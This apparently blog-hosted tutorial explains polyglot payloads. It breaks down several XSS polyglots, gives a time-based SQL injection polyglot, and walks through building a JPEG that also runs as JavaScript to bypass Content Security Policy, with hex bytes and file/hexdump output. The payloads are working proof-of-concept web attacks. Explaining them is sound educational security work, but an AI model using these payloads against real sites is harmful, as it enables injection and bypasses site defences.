It would take days if not weeks of work to cover all possible vulnerability scenarios with (for example) XSS with known paylodes. This is evidenced, for example, by the size of the potential vectors of attacks provided by PortSwigger. Polyglots are something of a "universal" payload consisting of several others. Note, however, that polyglots are often ineffective when working with systems that use WAF. This is because a system with properly prepared signatures will not allow our request to reach the destination.
Analysis of polyglots
To better understand the construction of polyglots, let's analyze one of them.
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
To begin with, let's break polyglot into its first parts.
-
jaVasCript:- label in ECMAScript; otherwise URI scheme. -
/*-/*/*/'/"/**/` - a polyline comment in ECMAScript; a sequence of breaking literals. -
(/* */oNcliCk=alert() )- execution zone wrapped in calling brackets, -
//%0D%0A%0d%0a//- single-line comment in ECMAScript; double CRLF in HTTP response headers, -
</stYle/</titLe/</teXtarEa/</scRipt/--!>- a sequence that breaks HTML tags, -
x3csVg/x3e` - svg element.
Some other interesting examples of polyglots are below.
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"></title></textarea></style></noscript></noembed></template></select><svg/oNloAd=alert()><FRAME onload=alert()></script>\";alert()//<svg/oNloAd=alert()>
SQLi polyglots (SQL injection).
Similar to Javascript code, we can create polyglots using the SQLL query language. As an example, consider code proposed by security researcher Mathias Karlsson.
SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/
Javascript/JPEG polyglots
So far we have analyzed XSS polyglots and those related to the SQL query language. However, it is possible to create polyglots directly related to both Javascript language and JPEG format. Ultimately, this would help bypass Content Security Policy on pages that use user-submitted images. The challenge of creating such a polyglot was taken up by researcher Gareth Heyes, and he describes the entire process in a shared article.
In short, creating a polyglot involved constructing a file that would be both a valid JPEG and Javascript file. This is possible because the two formats are not mutually exclusive.
The first step to create a universal file was to set the first two bytes as a Javascript variable (0xFF 0xD8 0xFF 0xE0). The next two bytes of the header (0x2F 0x2A) determine its length. Later there is a multi-line Javascript comment along with the 0x2F 0x2F2A completion zeros.
FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....
We start the JPEG comment with two bytes (0xFF 0xFE) and specify its length (0x99 0x1C). The next lines of code are the Javascript comment along with the payload (*/=alert("Burp rocks.")/*).
FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A
Then we need to close the JavaScript comment. In the described case, the last four bytes of the image were edited. Here is what the end of the file looks like:
2A 2F 2F 2F FF D9
The output of the standard file and hd -C commands can help us understand the above logic.
──$ file xss.jpg
xss.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 12074, comment: "*/=alert("Burp rocks.");/*", baseline, precision 8, 450x68, components 3
──$ hd -C xss.jpg
00000000 ff d8 ff e0 2f 2a 4a 46 49 46 00 01 01 01 00 48 |..../*JFIF.....H|
00000000 ff d8 ff e0 2f 2a 4a 46 49 46 00 01 01 01 00 48 |..../*JFIF.....H|
00000010 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |.H..............|
00000010 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |.H..............|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00002f20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe |................|
00002f20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe |................|
00002f30 00 1c 2a 2f 3d 61 6c 65 72 74 28 22 42 75 72 70 |..*/=alert("Burp|
00002f30 00 1c 2a 2f 3d 61 6c 65 72 74 28 22 42 75 72 70 |..*/=alert("Burp|
00002f40 20 72 6f 63 6b 73 2e 22 29 3b 2f 2a ff db 00 43 | rocks.");/*...C|
00002f40 20 72 6f 63 6b 73 2e 22 29 3b 2f 2a ff db 00 43 | rocks.");/*...C|
00002f50 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 |................|
00002f50 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 |................|
00002f60 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b |................|
00002f60 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b |................|
Polyglot innerht
Polyglot innerht is a site where users can submit their own polyglots. Some of them hold up to 20 contexts.
Sources
https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
https://dev.to/caffiendkitten/xss-javascript-polyglots-4i64
https://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra
Top comments (0)